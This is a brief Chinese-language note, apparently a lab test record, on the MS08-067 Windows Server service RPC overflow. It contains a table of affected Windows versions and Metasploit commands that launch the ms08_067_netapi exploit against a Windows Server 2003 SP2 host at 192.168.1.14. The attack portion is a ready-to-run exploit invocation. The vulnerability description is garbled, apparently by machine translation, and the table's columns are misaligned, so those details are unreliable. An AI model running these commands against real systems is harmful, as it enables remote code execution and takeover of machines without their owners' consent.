Pre-Beta中的Server服务允许远程攻击者通过精心设计的RPC请求执行任意代码,该请求会在执行以下操作时触发溢出路径规范化。
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows Server 2003 | SP1 | |||
| Windows Server 2003 | SP2 | ✔ | ||
| Windows Server 2003 | ||||
| Windows Server 2008 | X86/X64 | |||
| Windows Vista | SP1 | |||
| Windows Vista | ||||
| Windows Xp | SP2 | |||
| Windows Xp | SP3 | |||
| Windows Xp |
使用msf 测试系统Windows Server 2003 SP2 x86
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.14
run
